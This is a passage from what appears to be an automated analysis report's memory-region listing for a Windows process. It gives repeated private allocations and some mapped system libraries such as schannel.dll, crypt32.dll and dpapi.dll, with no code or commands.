0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1627 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1628 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1629 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1630 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1631 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1632 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1633 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1634 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1635 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1636 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1637 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1638 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1639 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1640 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1641 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1642 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1643 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1644 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1645 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1646 start_va = 0x3190000 end_va = 0x31cffff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1647 start_va = 0x3980000 end_va = 0x3a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 1648 start_va = 0x7f6fa000 end_va = 0x7f6fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f6fa000" filename = "" Region: id = 1649 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1650 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1651 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1652 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1653 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1654 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1655 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1656 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1657 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1658 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1659 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1660 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1661 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1662 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1663 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1664 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1665 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1666 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1667 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1668 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1669 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1670 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1671 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1672 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1673 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1674 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1675 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1676 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1677 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1678 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1679 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1680 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1681 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1682 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1683 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1684 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1685 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1686 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1687 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1688 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1689 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1690 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1691 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1692 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1693 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1694 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1695 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1696 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1697 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1698 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1699 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1700 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1701 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1702 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1703 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1704 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1705 start_va = 0x2f50000 end_va = 0x2f52fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1706 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1707 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1708 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1709 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1710 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1711 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1712 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1713 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1714 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1715 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1716 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1717 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1718 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1719 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1720 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1721 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1722 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1723 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1724 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1725 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1726 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1727 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1728 start_va = 0x2f50000 end_va = 0x2f52fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1729 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1730 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1731 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1732 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1733 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1734 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1735 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1736 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1737 start_va = 0x2f50000 end_va = 0x2f52fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1738 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1739 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1740 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1741 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1742 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1743 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1744 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1745 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1746 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1747 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1748 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1749 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1750 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1751 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1752 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1753 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1754 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1755 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1756 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1757 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1758 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1759 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1760 start_va = 0x2f50000 end_va = 0x2f52fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1761 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1762 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1763 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1764 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1765 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1766 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1767 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1768 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1769 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1770 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1771 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1772 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1773 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1774 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1775 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1776 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1777 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1778 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1779 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1780 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1781 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1782 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1783 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1784 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1785 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1786 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1787 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1788 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1789 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1790 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1791 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1792 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1793 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1794 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1795 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1796 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1797 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1798 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1799 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1800 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1801 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1802 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1803 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1804 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1805 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1806 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1807 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1808 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1809 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1810 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1811 start_va = 0x2f50000 end_va = 0x2f52fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1812 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1813 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1814 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1815 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1816 start_va = 0x73f00000 end_va = 0x73f5ffff entry_point = 0x73f00000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1817 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1818 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1819 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1820 start_va = 0x74eb0000 end_va = 0x75024fff entry_point = 0x74eb0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1821 start_va = 0x77ae0000 end_va = 0x77aedfff entry_point = 0x77ae0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1822 start_va = 0x2f60000 end_va = 0x2f61fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1823 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1824 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1825 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 1826 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1827 start_va = 0x73ed0000 end_va = 0x73eeffff entry_point = 0x73ed0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1828 start_va = 0x73ef0000 end_va = 0x73efffff entry_point = 0x73ef0000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1829 start_va = 0x73ea0000 end_va = 0x73ec7fff entry_point = 0x73ea0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1830 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1831 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1832 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1833 start_va = 0x73e90000 end_va = 0x73e97fff entry_point = 0x73e90000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1834 start_va = 0x773e0000 end_va = 0x77421fff entry_point = 0x773e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1835 start_va = 0x31d0000 end_va = 0x320ffff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 1836 start_va = 0x3a80000 end_va = 0x3b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 1837 start_va = 0x73e70000 end_va = 0x73e8efff entry_point = 0x73e70000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1838 start_va = 0x7f6ee000 end_va = 0x7f6f0fff 